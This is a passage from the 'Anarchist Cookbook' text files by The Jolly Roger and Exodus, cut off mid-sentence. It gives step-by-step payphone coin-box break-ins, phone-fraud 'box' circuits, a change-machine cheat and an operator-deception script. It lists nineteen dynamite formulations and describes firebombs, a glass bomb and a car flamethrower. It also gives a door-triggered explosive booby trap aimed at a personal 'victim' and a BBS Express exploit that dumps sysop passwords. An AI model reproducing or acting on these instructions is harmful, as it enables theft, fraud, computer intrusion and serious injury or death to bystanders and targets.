IN COLDER AREAS, SUCH AS CANADA, SOME SHREWD PEOPLE TAPE UP THE FONES USING
DUCT TAPE, POUR IN WATER,
AND COME BACK THE NEXT DAY WHEN THE WATER WILL
HAVE FROZE THUS EXPANDING AND CRACKING THE FONE OPEN.
IN ONE CASE,
"UNAUTHORIZED COIN COLLECTORS" WHERE CAUGHT WHEN THEY BROUGHT $6,000 IN CHANGE
TO A BANK
AND THE BANK BECAME SUSPICIOUS... AT ANY RATE, THE MAIN LOCK IS AN
EIGHT LEVEL TUMBLER LOCATED ON THE
RIGHT SIDE OF THE COIN BOX. THIS LOCK HAS
390,625 POSSIBLE POSITIONS (5 ^ 8, SINCE THERE ARE 8
TUMBLERS EACH WITH 5
POSSIBLE POSITIONS) THUS IT IS HIGHLY PICK RESISTANT! THE LOCK IS HELD IN PLACE
BY 4 SCREWS. IF THERE IS SUFFICIENT CLEARANCE TO THE RIGHT OF THE FONE, IT
IS CONCEIVABLE TO PUNCH OUT
THE SCREWS USING THE DRILLING PATTERN BELOW
(PROVIDED BY ALEXANDER MUNDY IN TAP #32):
====================================
!! ^
!! !
! 1- 3/16 " !! !
!<--- --->!! 1-1/2"
-------------------- !
! ! !! ! !
!
(+) (+)-! -----------
---! !! ! ^
! ! !! ! !
! ! (Z) !! ! !
! !
!! ! 2-3/16"
---! !! ! !
! (+) (+) ! !
! !! ! !
-------------------- -----------
!!
!!
(Z) KEYHOLE (+) SCREWS
!!
===================================
AFTER THIS IS
ACCOMPLISHED, THE LOCK CAN BE PUSHED BACKWARDS DISENGAGING THE LOCK FROM THE
COVER
PLATE. THE FOUR BOLTS OF THE COVER PLATE CAN THEN BE RETRACTED BY
TURNING THE BOLTWORKS WITH A SIMPLE
KEY IN THE SHAPE OF THE HOLE ON THE COIN
PLATE (SEE DIAGRAM BELOW). OF COURSE, THERE ARE OTHER METHODS
AND DRILLING
PATTERNS.
:-------------------------------------:
_
! !
( )
!_!
[ROUGHLY]
DIAGRAM OF COVER PLATE KEYHOLE
:-------------------------------------:
THE TOP COVER USES A SIMILAR
(BUT NOT AS STRONG) LOCKING METHOD WITH THE KEYHOLE DEPICTED ABOVE ON THE
TOP LEFT HIDE AND A REGULAR LOCK (PROBABLY TUMBLER ALSO) ON THE TOP
RIGHT-HAND SIDE. IT IS INTERESTING
TO EXPERIMENT WITH THE COIN SHUTE AND THE
FORTRESSES OWN "RED BOX" (WHICH BELL DIDN'T HAVE THE 'BALLS'
TO COLOR RED).
MISCELLANEOUS:
IN A FEW AREAS (RURAL & CANADA), POST-PAY
SERVICE EXISTS. WITH THIS TYPE OF SERVICE, THE MOUTHPIECE IS
CUT OFF UNTIL
THE CALLER DEPOSITS MONEY WHEN THE CALLED PARTY ANSWERS. THIS ALSO ALLOWS FOR
FREE CALLS
TO WEATHER AND OTHER DIAL-IT SERVICES! RECENTLY, 2600 MAGAZINE
ANNOUNCED THE CLEAR BOX WHICH CONSISTS
OF A TELEPHONE PICKUP COIL AND A
SMALL AMP. IT IS BASED ON THE RINCIPAL THAT THE RECEIVER IS ALSO A
WEAK
TRANSMITTER AND THAT BY AMPLIFYING YOUR SIGNAL YOU CAN TALK VIA THE TRANSMITTER
THUS AVOIDING
COSTLY TELEPHONE CHARGES! MOST FORTRESSES ARE FOUND IN THE
9XXX AREA. UNDER FORMER BELL AREAS, THEY
USUALLY START AT 98XX (RIGHT BELOW
THE 99XX OFFICIAL SERIES) AND MOVE DOWNWARD.
SINCE THE LINE, NOT THE FONE,
DETERMINES WHETHER OR NOT A DEPOSIT MUST BE MADE, DTF & CHARGE-A-CALL
FONES MAKE GREAT EXTENSIONS! FINALLY, FORTRESS FONES ALLOW FOR A NEW
HOBBY--INSTRUCTION PLATE
COLLECTING. ALL THAT IS REQUIRED IS A FLAT-HEAD
SCREWDRIVER AND A PAIR OF NEEDLE-NOSE PLIERS. SIMPLY
USE THE SCREWDRIVER TO
LIFT UNDERNEATH THE PLATE SO THAT YOU CAN GRAB IT WITH THE PLIERS AND YANK
DOWNWARDS. I WOULD SUGGEST COVERING THE TIPS OF THE PLIERS WITH ELECTRICAL
TAPE TO PREVENT SCRATCHING.
TEN CENT PLATES ARE DEFINITELY BECOMING A
"RARITY!"
FORTRESS SECURITY:
WHILE A LONELY FORTRESS MAY SEEM
THE PERFECT TARGET, BEWARE! THE GESTAPO HAS BEEN KNOWN TO STAKE OUT
FORTRESSES FOR AS LONG AS 6 YEARS ACCORDING TO THE GRASS ROOTS QUARTERLY. TO
AVOID ANY PROBLEMS, DO
NOT USE THE SAME FONES REPEATEDLY FOR BOXING, CALLING
CARDS, & OTHER EXPERIMENTS. THE TELCO KNOWS HOW
MUCH MONEY SHOULD BE IN
THE COIN BOX AND WHEN ITS NOT THERE THEY TEND TO GET PERTURBED (READ: PISSED
OFF).
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--------Jolly
Roger
p.s. This was originally written back in my old Apple ][ days,
hence the upper case. I just did not
think I should waste the little time I
have to work on this shit converting it to lower- case. Hell, I
thought
80-columns was pretty nice of me.. heh heh. Well, enjoy this and the rest of
this Cookbook!
---------JR
From the CookBook 4.. Exodus
Index
Black Box Plans by The Jolly Roger
Introduction: At any given time, the voltage running through your phone
is about 20 Volts. When
someone calls you, this voltage goes up to 48 Volts
and rings the bell. When you answer, the voltage
goes down to about 10
Volts. The phone company pays attention to this. When the voltage drops to 10,
they start billing the person who called you.
Function: The Black
Box keeps the voltage going through your phone at 36 Volts, so that it never
reaches 10 Volts. The phone company is thus fooled into thinking you never
answered the phone and does
not bill the caller. However, after about a half
hour the phone company will get suspicious and
disconnect your line for
about 10 seconds.
Materials:
* 1 1.8K 1/2 Watt Resistor
* 1 1.5V
LED
* 1 SPST Switch
Procedure:
1. Open your phone by loosening
the two screws on the bottom and lifting the case off.
2. There should be
three wires: Red, Green, and Yellow. We'll be working with the Red Wire.
3.
Connect the following in parallel:
A. The Resistor and LED.
B. The SPST
Switch.
In other words, you should end up with this:
(Red Wire)
!---/\/\/\--O--!
(Line)-----! !-----(Phone)
!-----_/_------!
/\/\/\ = Resistor
O = LED
_/_ = SPST
Use: The SPST Switch is
the On/Off Switch of the Black Box. When the box is off, your phone behaves
normally. When the box is on and your phone rings, the LED flashes. When you
answer, the LED stays on
and the voltage is kept at 36V, so the calling
party doesn't get charged. When the box is on, you will
not get a dial tone
and thus cannot make calls. Also remember that calls are limited to half an
hour.
------------Exodus
p.s. Due to new Fone Company switching
systems & the like, this may or may not work in your area. If
you live
in bumfuck Kentucky, then try this out. I make no guarantees! (I never do...)
----Ex.
Index
The Infamous Blotto Box!! by The Jolly Roger
(I bet that NOONE has the balls to build this one!)
Finally, it
is here! What was first conceived as a joke to fool the innocent phreakers
around America
has finally been conceived! Well, for you people who are
unenlightened about the Blotto Box, here is a
brief summery of a legend.
--*-=> The Blotto Box <=-*--
For years now every pirate
has dreamed of the Blotto Box. It was at first made as a joke to mock more
ignorant people into thinking that the function of it actually was possible.
Well, if you are The
Voltage Master, it is possible. Originally conceived by
King Blotto of much fame, the Blotto Box is
finally available to the public.
NOTE: Jolly Roger can not be responsible for the information disclosed in
the file! This file is
strictly for informational purposes and should not be
actually built and used! Usage of this
electronical impulse machine could
have the severe results listed below and could result in high
federal
prosecution! Again, I TAKE NO RESPONSIBILITY!
All right, now that that is
cleared up, here is the basis of the box and it's function.
The Blotto Box
is every phreaks dream... you could hold AT&T down on its knee's with this
device.
Because, quite simply, it can turn off the phone lines everywhere.
Nothing. Blotto. No calls will be
allowed out of an area code, and no calls
will be allowed in. No calls can be made inside it for that
matter. As long
as the switching system stays the same, this box will not stop at a mere area
code. It
will stop at nothing. The electrical impulses that emit from this
box will open every line. Every line
will ring and ring and ring... the
voltage will never be cut off until the box/generator is stopped.
This is no
200 volt job, here.
We are talking GENERATOR. Every phone line will continue
to ring, and people close to the box may be
electricuted if they pick up the
phone. But, the Blotto Box can be stopped by merely cutting of the
line or
generator. If they are cut off then nothing will emit any longer. It will take a
while for the
box to calm back down again, but that is merely a superficial
aftereffect. Once again: Construction
and use of this box is not advised!
The Blotto Box will continue as long as there is electricity to
continue
with.
OK, that is what it does, now, here are some interesting things for
you to do with it...
-*-=>Blotto Functions/Installin'<=-*-
Once you have installed your Blotto, there is no turning back. The
following are the instructions for
construction and use of this box. Please
read and heed all warnings in the above section before you
attempt to
construct this box.
Materials:
* A Honda portable generator or a
main power outlet like in a stadium or some such place.
* 400 volt rated
coupler that splices a female plug into a phone line jack.
* A meter of
voltage to attach to the box itself.
* A green base (i.e. one of the nice
boxes about 3' by 4' that you see around in your neighborhood.
They are the
main switch boards and would be a more effective line to start with. or: A
regular
phone jack (not your own, and not in your area code!
* A
soldering iron and much solder.
* A remote control or long wooden pole.
Now. You must have guessed the construction from that. If not, here
goes, I will explain in detail.
Take the Honda Portable Generator and all of
the other listed equiptment and go out and hunt for a
green base. Make sure
it is one on the ground or hanging at head level from a pole, not the huge ones
at the top of telephone poles. Open it up with anything convienent, if you
are two feeble that fuck
don't try this.
Take a look inside... you are
hunting for color-coordinating lines of green and red. Now, take out
your
radio shack cord and rip the meter thing off. Replace it with the voltage meter
about. A good
level to set the voltage to is about 1000 volts. Now, attach
the voltage meter to the cord and set the
limit for one thousand. Plug the
other end of the cord into the generator. Take the phone jack and
splice the
jack part off.
Open it up and match the red and green wires with the other
red and green wires. NOTE: If you just had
the generator on and have done
this in the correct order, you will be a crispy critter. Keep the
generator
off until you plan to start it up. Now, solder those lines together carefully.
Wrap duck
tape or insultation tape around all of the wires. Now, place the
remote control right on to the
startup of the generator. If you have the
long pole, make sure it is very long and stand back as far
away as you can
get and reach the pole over.
NOTICE: If you are going right along with this
without reading the file first, you still realize now
that your area code is
about to become null! Then, getting back, twitch the pole/remote control and
run for your damn life. Anywhere, just get away from it. It will be
generating so much electricity
that if you stand to close you will kill
yourself.
The generator will smoke, etc. but will not stop. You are now
killing your area code, because all of
that energy is spreading through all
of the phone lines around you in every direction.
Have a nice day!
--*-=>The Blotto Box: Aftermath<=-*-- Well, that is the plans for
the most devastating and ultimately
deadly box ever created. My hat goes off
to: King Blotto (for the original idea).
---------Exodus
Index
Blowgun by The Jolly Roger
In this article I shall attempt to explain the use and manufacture of a
powerfull blow-gun and making
darts for the gun.The possesion of the blow
gun described in this article IS a felony. So be carefull
where you use it.
I don't want to get you all busted.
Needed:
* Several strands of
yarn (About 2 inches a-piece)
* A regular pencil
* A 2 1/4 inch long
needle (hopefully with a beaded head. If not obtainable,wrap tape around end of
needle.
* 2-3 1/4 foot pipe. (PVC or Aluminum) Half a inch in diameter
Constructing the dart:
1. Carefully twist and pull the metal part
(Along with eraser) of the pencil till it comes off.
2. Take Pin and start
putting about 5-7 Strands of yarn on the pin. Then push them up to the top of
the pin. But not over the head of the pin (orthe tape).
3. Push pin
through the hollow part of the head where the pencil was before.
4. That
should for a nice looking dart. (see illustration)
#####
>>>>>-----/ # is the yarn
> is the head of the pencil
- is the pin it-self
/ is the head of the pin
Using the Darts:
1. Now take the finished dart and insert it in the tube (if it is too small
put on more yarn.)
2. Aim the tube at a door, wall, sister, ect.
3. blow
on the end of the pipe.
4. Sometimes the end of the pipe may be sharp. When
this happens I suggest you wrap it with some
black electrician tape.It
should feel a lot better.
-= Exodus =-
Index
Brown Box Plans by The Jolly Roger
This is a fairly simple mod that can be made to any phone. All it does
is allow you to take any two
lines in your house and create a party line. So
far I have not heard of anyone who has any problems
with it. There is one
thing that you will notice when you are one of the two people who is called by a
person with a brown box. The other person will sound a little bit faint. I
could overcome this with
some amplifiers but then there wouldn't be very
many of these made [Why not?]. I think the convenience
of having two people
on the line at once will make up for any minor volume loss.
Here is the
diagram:
KEY:___________________________________
| PART | SYMBOL |
|---------------------------------|
| BLACK WIRE | * |
| YELLOW WIRE
| = |
| RED WIRE | + |
| GREEN WIRE | - |
| SPDT SWITCH | _/_ |
| _/_ |
| VERTICAL WIRE | | |
| HORIZONTAL WIRE | _ |
-----------------------------------
* = - +
* = - +
* = - +
* = - +
* = - +
* ==_/_- +
*******_/_++++++
| |
| |
| |
| |
| |
| |
|_____PHONE____|
------------Exodus
Index
Calcium Carbide Bomb by The Jolly Roger
This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain some
calcium carbide. This is the
stuff that is used in carbide lamps and can be
found at nearly any hardware store. Take a few pieces
of this stuff (it
looks like gravel) and put it in a glass jar with some water. Put a lid on
tightly.
The carbide will react with the water to produce acetylene
carbonate which is similar to the gas used
in cutting torches. Eventually
the glass with explode from internal pressure. If you leave a burning
rag
nearby, you will get a nice fireball!
-----------Exodus
Index
Ripping off Change Machines by the Jolly Roger
Have you ever seen one of those really big changer machines in airports
laundrymats or arcades that
dispense change when you put in your 1 or 5
dollar bill? Well then, here is an article for you.
* Find the type of
change machine that you slide in your bill length wise, not the type where you
put the bill in a tray and then slide the tray in!!!
* After finding the
right machine, get a $1 or $5 bill. Start crumpling up into a ball. Then smooth
out the bill, now it should have a very wrinkly surface.
* Now the hard
part. You must tear a notch in the bill on the left side about 1/2 inch below
the
little 1 dollar symbol (See Figure).
* If you have done all of this
right then take the bill and go out the machine. Put the bill in the
machine
and wait. What should happen is: when you put your bill in the machine it thinks
everything is fine. When it gets to the part of the bill with the notch cut
out, the machine will
reject the bill and (if you have done it right) give
you the change at the same time!!! So, you
end up getting your bill back,
plus the change!! It might take a little practice, but once you get
the hang
of it, you can get a lot of money!
!--------------------------------!
!
!
! (1) /-------\ (1) !
! ! ! !
! ! Pic. ! !
! (1) /\ \-------/
(1) !
! !! !
!-----/ \-----------------------!
\-------Make notch
here.
About 1/2 " down from (1)
P.S. Sorry for the "text work" but
you should be able to get the idea. Have fun!!! -= Exodus =-
Index
Clear Box Plans by The Jolly Roger
The clear box is a new device which has just been invented that can be
used throughout Canada and
rural United States. The clear box works on
"PostPay" payphones (fortress fones). Those are the
payphones that don't
require payment until after the connection is established. You pick up the fone,
get a dial tone, dial your number, and then insert your money after the
person answers.
If you don't deposit the money then you can not speak to the
person on the other end because your
mouth piece is cut off but not the
ear-piece. (obviously these phones are nice for free calls to
weather or
time or other such recordings). All you must do is to go to your nearby Radio
Shack, or
electronics store, and get a four-transistor amplifier and a
telephone suction cup induction pick-up.
The induction pick-up would be
hooked up as it normally would to record a conversation, except that it
would be plugged into the output of the amplifier and a microphone would be
hooked to the input. So
when the party that is being called answers, the
caller could speak through the little microphone
instead. His voice then
goes through the amplifier and out the induction coil, and into the back of
the receiver where it would then be broadcast through the phone lines and
the other partywould be able
to hear the caller. The Clear Box thus 'clears
up' the problem of not being heard. Luckily, the line
will not be cut-off
after a certain amount of time because it will wait forever for the coins to be
put in.
The biggest advantage for all of us about this new clear box is
the fact that this type of payphone
will most likely become very common. Due
to a few things: 1st, it is a cheap way of getting the DTF,
dial-tone-first
service, 2nd, it doesn't require any special equipment, (for the phone company)
This
payphone will work on any phone line. Usually a payphone line is
different, but this is a regular
phone line and it is set up so the phone
does all the charging, not the company.
------------Exodus
Index
CNA List Courtesy of The Jolly Roger
NPA TEL NO NPA TEL NO
--------------------------------------
201
201-676-7070 601 601-961-8139
202 304-343-7016 602 303-293-8777
203
203-789-6815 603 617-787-5300
204 204-949-0900 604 604-432-2996
205
205-988-7000 605 402-580-2255
206 206-382-5124 606 502-583-2861
207
617-787-5300 607 518-471-8111
208 303-293-8777 608 608-252-6932
209
415-543-2861 609 201-676-7070
212 518-471-8111 612 402-580-2255
213
415-781-5271 613 416-443-0542
214 214-464-7400 614 614-464-0123
215
412-633-5600 615 615-373-5791
216 614-464-0123 616 313-223-8690
217
217-525-5800 617 617-787-5300
218 402-580-2255 618 217-525-5800
219
317-265-4834 619 818-501-7251
301 304-343-1401 701 402-580-2255
302
412-633-5600 702 415-543-2861
303 303-293-8777 703 304-344-7935
304
304-344-8041 704 912-784-0440
305 912-784-0440 705 416-979-3469
306
306-347-2878 706 *** NONE ***
307 303-293-8777 707 415-543-6374
308
402-580-2255 709 *** NONE ***
309 217-525-5800 712 402-580-2255
312
312-796-9600 713 713-861-7194
313 313-223-8690 714 818-501-7251
314
314-721-6626 715 608-252-6932
315 518-471-8111 716 518-471-8111
316
816-275-2782 717 412-633-5600
317 317-265-4834 718 518-471-8111
318
504-245-5330 801 303-293-8777
319 402-580-2255 802 617-787-5300
401
617-787-5300 803 912-784-0440
402 402-580-2255 804 304-344-7935
403
403-425-2652 805 415-543-2861
404 912-784-0440 806 512-828-2501
405
405-236-6121 807 416-443-0542
406 303-293-8777 808 212-334-4336
408
415-543-6374 809 212-334-4336
409 713-861-7194 812 317-265-4834
412
413-633-5600 813 813-228-7871
413 617-787-5300 814 412-633-5600
414
608-252-6932 815 217-525-5800
415 415-543-6374 816 816-275-2782
416
416-443-0542 817 214-464-7400
417 314-721-6626 818 415-781-5271
418
514-725-2491 819 514-725-2491
419 614-464-0123 901 615-373-5791
501
405-236-6121 902 902-421-4110
502 502-583-2861 904 912-784-0440
503
206-382-5124 906 313-223-8690
504 504-245-5330 907 *** NONE ***
505
303-293-8777 912 912-784-0440
506 506-648-3041 913 816-275-2782
507
402-580-2255 914 518-471-8111
509 206-382-5124 915 512-828-2501
512
512-828-2501 916 415-543-2861
513 614-464-0123 918 405-236-6121
514
514-725-2491 919 912-784-0440
515 402-580-2255 516 518-471-8111
517
313-223-8690 518 518-471-8111
519 416-443-0542 900 201-676-7070
From
the CookBook 4.............. Exodus
Index
Electronic Terrorism by The Jolly Roger
It starts when a big, dumb lummox rudely insults you. Being of a
rational, intelligent disposition,
you wisely choose to avoid a (direct)
confrontation. But as he laughs in your face, you smile
inwardly---your
revenge is already planned.
Step 1: follow your victim to his locker,
car, or house. Once you have chosen your target site, lay
low for a week or
more, letting your anger boil.
Step 2: in the mean time, assemble your
versatile terrorist kit(details below.)
Step 3: plant your kit at the
designated target site on a monday morning between the hours of 4:00 am
and
6:00 am. Include a calm, suggestive note that quietly hints at the possibility
of another attack.
Do not write it by hand! An example of an effective note:
"don't be such a jerk, or the next one will take off your hand. Have a nice
day."
Notice how the calm tone instills fear. As if written by a homicidal
psychopath.
Step 4: choose a strategic location overlooking the target
site. Try to position yourself in such a
way that you can see his facial
contortions.
Step 5: sit back and enjoy the fireworks!
Assembly
of the versatile, economic, and effective terrorist kit #1: the parts you'll
need are:
* 4 aa batteries
* 1 9-volt battery
* 1 spdt mini relay
(radio shack)
* 1 rocket engine(smoke bomb or m-80)
* 1 solar ignitor
(any hobby store)
* 1 9-volt battery connector
Step 1: take the
9-volt battery and wire it through the relay's coil. This circuit should also
include
a pair of contacts that when separated cut off this circuit. These
contacts should be held together by
trapping them between the
locker,mailbox, or car door.
Once the door is opened, the contacts fall
apart and the 9-volt circuit is broken, allowing the relay
to fall to the
closed postion thus closing the ignition circuit. (If all this is confusing take
a look
at the schematic below.)
Step 2: take the 4 aa batteries and
wire them in succession. Wire the positive terminal of one to the
negative
terminal of another, until all four are connected except one positive terminal
and one
negative terminal. Even though the four aa batteries only combine to
create 6 volts, the increase in
amperage is necessary to activate the solar
ignitor quickly and effectively.
Step 3: take the battery pack (made in
step 2) and wire one end of it to the relay's single pole and
the other end
to one prong of the solar ignitor. Then wire the other prong of the solar
ignitor back
to the open position on the relay.
Step 4: using double
sided carpet tape mount the kit in his locker, mailbox, or car door. And last,
insert the solar ignitor into the rocket engine (smoke bomb or m-80).
Your kit is now complete!
---------><---------
I
(CONTACTS) I
I I
I - (BATTERY)
I ---
I I
I (COIL) I
------///////-------
/-----------
/ I
/ I
/ I
(SWITCH) I
I
I I
I --- (BATTERY)
I - ( PACK )
I ---
I I
I I
---- -----
I I
*
(SOLAR IGNITOR)
---------Exodus---------
Index
How to Start A Conference w/o 2600hz or M-F by The Jolly Roger
(Originally an Apple ][ file, forgive the upper case!)
THIS
METHOD OF STARTING THE CONF. DEPENDS ON YOUR ABILITY TO BULLSHIT THE OPERATOR
INTO DIALING A
NUMBER WHICH CAN ONLY BE REACHED WITH AN OPERATOR'S M-F
TONES. WHEN BULLSHITTING THE OPERATOR REMEMBER
OPERATOR'S ARE NOT HIRED TO
THINK BUT TO DO.
HERE IS A STEP-BY-STEP WAY TO THE CONF.:
1. CALL
THE OPERATOR THROUGH A PBX OR EXTENDER, YOU COULD JUST CALL ONE THROUGH YOUR
LINE BUT I
WOULDN'T RECOMMEND IT.
2. SAY TO THE OPERATOR:
TSPS
MAINTENENCE ENGINEER, RING-FORWARD TO 213+080+1100, POSITION RELEASE, THANKYOU.
(SHE WILL PROBABLY ASK YOU FOR THE NUMBER AGAIN)
DEFINITIONS:
RING-FORWARD - INSTRUCTS HER TO DIAL THE NUMBER. POSITION RELEASE - INSTUCTS HER
TO
RELEASE THE TRUNK AFTER SHE HAS DIALED THE NUMBER.
+ - REMBER TO SAY
213PLUS080 PLUS1100.
3. WHEN YOU ARE CONNECTED WITH THE CONF. YOU WILL HERE
A WHISTLE BLOW TWICE AND A RECORDING ASKING YOU
FOR YOUR OPERATOR #. DIAL IN
ANY FIVE DIGITS AND HIT THE POUNDS SIGN A COUPLE OF TIMES. SIMPLY DIAL IN
THE # OF THE BILLING LINE ECT. WHEN THE RECORDING ASK FOR IT.
4. WHEN IN
THE CONTROL MODE OF THE CONF. HIT '6' TO TRANSFER CONTROL. HIT '001' TO REENTER
THE # OF
CONFEREE'S AND TIME AMOUNT WHICH YOU GAVE WHEN YOU STARED THE CONF.
REMEMBER THE SIZE CAN BE FROM 2-59
CONFEREE'S. I HAVE NOT FOUND OUT THE
'LENGTHS' LIMITS.
Index
How to Make Dynamite by The Jolly Roger
Dynamite is nothing more than just nitroglycerin and a stablizing agent
to make it much safer to use.
For the sake of saving time, I will abbreviate
nitroglycerin with a plain NG. The numbers are
percentages, be sure to mix
these carefully and be sure to use the exact amounts. These percentages
are
in weight ratio, not volume.
no. ingredients amount
---------------------------------------
#1 NG 32
sodium nitrate 28
woodmeal 10
ammonium oxalate 29
guncotten 1
#2 NG 24
potassium nitrate 9
sodium nitate 56
woodmeal 9
ammonium oxalate
2
#3 NG 35.5
potassium nitrate 44.5
woodmeal 6
guncotton 2.5
vaseline 5.5
powdered charcoal 6
#4 NG 25
potassium nitrate 26
woodmeal 34
barium nitrate 5
starch 10
#5 NG 57
potassium
nitrate 19
woodmeal 9
ammonium oxalate 12
guncotton 3
#6 NG 18
sodium nitrate 70
woodmeal 5.5
potassium chloride 4.5
chalk 2
#7 NG 26
woodmeal 40
barium nitrate 32
sodium carbonate 2
#8
NG 44
woodmeal 12
anhydrous sodium sulfate 44
#9 NG 24
potassium
nitrate 32.5
woodmeal 33.5
ammonium oxalate 10
#10 NG 26
potassium nitrate 33
woodmeal 41
#11 NG 15
sodium nitrate 62.9
woodmeal 21.2
sodium carbonate .9
#12 NG 35
sodium nitrate 27
woodmeal 10
ammonium oxalate 1
#13 NG 32
potassium nitrate 27
woodmeal 10
ammonium oxalate 30
guncotton 1
#14 NG 33
woodmeal 10.3
ammonium oxalate 29
guncotton .7
potassium
perchloride 27
#15 NG 40
sodium nitrate 45
woodmeal 15
#16 NG 47
starch 50
guncotton 3
#17 NG 30
sodium nitrate 22.3
woodmeal
40.5
potassium chloride 7.2
#18 NG 50
sodium nitrate 32.6
woodmeal 17
ammonium oxalate .4
#19 NG 23
potassium nitrate 27.5
woodmeal 37
ammonium oxalate 8
barium nitrate 4
calcium
carbonate .5
Household equivalants for chemicles
It has come to
my attention that many of these chemicles are sold under brand names, or have
household
equivalants. here is a list that might help you out. Also, see
elsewhere in this Cookbook for a more
complete listing............
acetic acid vinegar
aluminum oxide alumia
aluminum potassium sulfate
alum
aluminum sulfate alum
ammonium hydroxide ammonia
carbon
carbonate chalk
calcium hypochloride bleaching powder
calcium oxide lime
calcium sulfate plaster of paris
carbonic acid seltzer
carbon
tetrachloride cleaning fluid
ethylene dichloride Dutch fluid
ferric
oxide iron rust
glucose corn syrup
graphite pencil lead
hydrochloric
acid muriatic acid
hydrogen peroxide peroxide
lead acetate sugar of lead
lead tetrooxide red lead
magnesium silicate talc
magnesium sulfate
Epsom salts
naphthalene mothballs
phenol carbolic acid
potassium
bicarbonate cream of tartar
potassium chromium sulf. chrome alum
potassium nitrate saltpeter
sodium dioxide sand
sodium bicarbonate
baking soda
sodium borate borax
sodium carbonate washing soda
sodium
chloride salt
sodium hydroxide lye
sodium silicate water glass
sodium sulfate glauber's salt
sodium thiosulfate photographer's hypo
sulferic acid battery acid
sucrose cane sugar
zinc chloride tinner's
fluid
Keep this list handy at all times. If you can't seem to get one or
more of the ingredients try another
one. If you still can't, you can always
buy small amounts from your school, or maybe from various
chemical
companies. When you do that, be sure to say as little as possible, if during the
school year,
and they ask, say it's for a experiment for school.
-------------Exodus-------------
Index
Auto Exhaust Flame Thrower by The Jolly Roger
For this one, all you need is a car, a sparkplug, ignition wire and a
switch. Install the spark plug
into the last four or five inches of the
tailpipeby drilling a hole that the plug can screw into
easily. Attach the
wire (this is regular insulated wire) to one side of the switch and to the spark
plug. The other side of the switch is attached to the positive terminal on
the battery. With the car
running, simply hit the switch and watch the
flames fly!!! Again be careful that no one is behind you!
I have seen some
of these flames go 20 feet!!!
-------------Exodus------------
Index
Breaking into BBS Express Courtesy of the Jolly Roger
If you have high enough access on any BBS Express BBS you can get the
Sysop's password without any
problems and be able to log on as him and do
whatever you like. Download the Pass file, delete the
whole BBS, anything.
Its all a matter of uploading a text file and d/ling it from the BBS. You must
have high enough access to see new uploads to do this. If you can see a file
you just uploaded you
have the ability to break into the BBS in a few easy
steps.
Why am I telling everyone this when I run BBS Express myself? Well
there is one way to stop this from
happening and I want other Sysops to be
aware of it and not have it happen to them.
Breaking in is all based on the
MENU function of BBS Express. Express will let you create a menu to
display
different text files by putting the word MENU at the top of any text file and
stating what
files are to be displayed. But due to a major screw up by Mr.
Ledbetter you can use this MENU option
to display the USERLOG and the
Sysop's Passwords or anything else you like. I will show you how to get
the
Sysop's pass and therefore log on as the Sysop. BBs Express Sysop's have 2
passwords. One like
everyone else gets in the form of X1XXX, and a Secondary
password to make it harder to hack out the
Sysops pass.
The Secondary
pass is found in a file called SYSDATA.DAT. This file must be on drive 1 and is
therefore easy to get. All you have to do is upload this simple Text file:
MENU
1
D1:SYSDATA.DAT
Ripoff time!
after you upload
this file you d/l it non-Xmodem. Stupid Express thinks it is displaying a menu
and
you will see this:
Ripoff time!
Selection [0]:
Just
hit 1 and Express will display the SYSDATA.DAT file.OPPASS is where the Sysop's
Secondary pass
will be. D1:USERLOG.DAT is where you will find the name and
Drive number of the USERLOG.DAT file. The
Sysop might have renamed this file
or put it in a Subdirectory or even on a different drive. I Will
Assume he
left it as D1:USERLOG.DAT. The other parts of this file tell you where the .HLP
screens are
and where the LOG is saved and all the Download path names.
Now to get the Sysop's primary pass you upload a text file like this:
MENU
1
D1:USERLOG.DAT
Breaking into Bedwetter's BBS
Again you then d/l this file non-Xmodem and you will see:
Breaking
into Bedwetter's BBS
Selection [0]:
You then hit 1 and the long
USERLOG.DAT file comes flying at you. The Sysop is the first entry in this
very long file so it is easy. You will see:
SYSOP'S NAME X1XXX
You should now have his 2 passwords.
There is only one easy way
out of this that I can think of, and that is to make all new uploads go to
SYSOP level (Level 9) access only. This way nobody can pull off what I just
explained.
I feel this is a major Bug on Mr. Ledbetter's part. I just don't
know why no one had thought of it
before. I would like to give credit to
Redline for the message he left on Modem Hell telling about
this problem,
and also to Unka for his ideas and input about correcting it.
This has
been brought to you from [_The_Piper_] and the S.O.D. BBS Network!
Index
Firebombs by the Jolly Roger
Most fire bombs are simply gasoline filled bottles with a fuel soaked
rag in the mouth (the bottle's
mouth, not yours). The original Molotov
cocktail, and still about the best, was a mixture of one part
gasoline and
one part motor oil. The oil helps it to cling to what it splatters on.
Some
use one part roofing tar and one part gasoline. Fire bombs have been found which
were made by
pouring melted wax into gasoline.
-------------Exodus-------------
Index
Fuse Ignition Bomb by The Jolly Roger
A four strand homemade fuse is used for this. It burns like fury. It is
held down and concealed by a
strip of bent tin cut from a can. The exposed
end of the fuse is dipped into the flare igniter. To use
this one, you light
the fuse and hold the fire bomb until the fuse has burned out of sight under the
tin. Then throw it and when it breaks, the burning fuse will ignite the
contents.
-------------Exodus------------ see later file on these...
Index
Generic Bomb by the Jolly Roger
* Aquire a glass container
* Put in a few drops of gasoline
*
Cap the top
* Now turn the container around to coat the inner surfaces and
then evaporates
* Add a few drops of potassium permanganate (<-Get this
stuff from a snake bite kit)
* The bomb is detonated by throwing aganist a
solid object.
*AFTER THROWING THIS THING RUN LIKE HELL THIS THING PACKS
ABOUT 1/2 STICK OF DYNAMITE*
---------------Exodus
Index
Green Box Plans by the Jolly Roger
Paying the initial rate in order to use a red box (on certain
fortresses) left a sour taste in many
red boxers mouths, thus the green box
was invented. The green box generates useful tones such as COIN
COLLECT,
COIN RETURN, AND RINGBACK. These are the tones that ACTS or the TSPS operator
would send to
the CO when appropriate. Unfortunately, the green box cannot
be used at the fortress station but must
be used by the CALLED party.
Here are the tones:
COIN COLLECT 700+1100hz
COIN RETURN
1100+1700hz
RINGBACK 700+1700hz
Before the called party sends any of
these tones, an operator realease signal should be sent to alert
the MF
detectors at the CO. This can be done by sending 900hz + 1500hz or a single 2600
wink (90 ms.)
Also do not forget that the initial rate is collected shortly
before the 3 minute period is up.
Incidentally, once the above MF tones for
collecting and returning coins reach the CO, they are
converted into an
appropriate DC pulse (-130 volts for return and +130 for collect). This pulse is
then sent down the tip to the fortress. This causes the coin relay to either
return or collect the
coins.
The alledged "T-network" takes advantage of
this information. When a pulse for coin collect (+130 VDC)
is sent down the
line, it must be grounded somewhere. This is usually the yellow or black wire.
Thus, if the wires are exposed, these wires can be cut to prevent the pulse
from being grounded. When
the three minute initial period is almost up, make
